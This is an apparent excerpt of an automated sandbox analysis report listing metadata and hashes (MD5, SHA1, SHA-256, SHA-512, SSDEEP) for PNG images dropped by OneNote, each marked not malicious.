                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
